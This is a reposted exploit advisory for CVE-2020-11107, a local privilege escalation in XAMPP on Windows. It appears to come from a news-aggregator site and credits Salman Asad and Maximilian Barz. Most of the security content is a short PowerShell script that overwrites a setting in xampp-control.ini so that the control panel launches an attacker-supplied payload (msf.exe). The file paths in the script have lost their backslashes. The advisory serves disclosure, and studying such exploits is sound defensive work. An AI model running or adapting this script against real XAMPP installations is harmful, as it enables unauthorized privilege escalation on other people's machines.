Cyber Security

XAMPP 7.4.3 Privilege Escalation

Avatar photo

Bybmalandrone

Sep 27, 2021 , , , ,
Authored by Salman Asad

XAMPP version 7.4.3 suffers from a local privilege escalation vulnerability.

advisories | CVE-2020-11107

# Exploit Title: XAMPP 7.4.3 - Local Privilege Escalation
# Exploit Author: Salman Asad (@deathflash1411, [email protected])
# Original Author: Maximilian Barz (@S1lkys)
# Date: 27/09/2021
# Vendor Homepage: https://www.apachefriends.org
# Version: XAMPP < 7.2.29, 7.3.x < 7.3.16 & 7.4.x < 7.4.4
# Tested on: Windows 10 + XAMPP 7.3.10
# References: https://github.com/S1lkys/CVE-2020-11107
$file = "C:xamppxampp-control.ini"
$find = ((Get-Content $file)[2] -Split "=")[1]
# Insert your payload path here
$replace = "C:tempmsf.exe"
(Get-Content $file) -replace $find, $replace | Set-Content $file

Related posts:

All Log4j, logback bugs we know so far and why you MUST ditch 2.15
New JinxLoader Targeting Users with Formbook and XLoader Malware
The Intersection of OT and IT: Why Unified Cybersecurity is More Important than Ever.
Trump visits Ohio train derailment site in effort to highlight Biden's absence
WordPress Contact Form 1.7.14 Cross Site Scripting

You missed

Fox News Politics Republican

Georgia’s nearly 4 million early votes bode well for Trump, top state Republican says

Nov 2, 2024 foxnews.com
Fox News Politics Republican

Harris, Trump ‘leave nothing on the field’ in final weekend before Election Day

Nov 2, 2024 foxnews.com
Fox News Politics Republican

Battleground state face-off: Harris, Trump hold dueling rallies miles apart

Nov 1, 2024 foxnews.com
NBA Sports

Banchero to travel, stay ‘engaged’ during injury

Nov 1, 2024 espn.com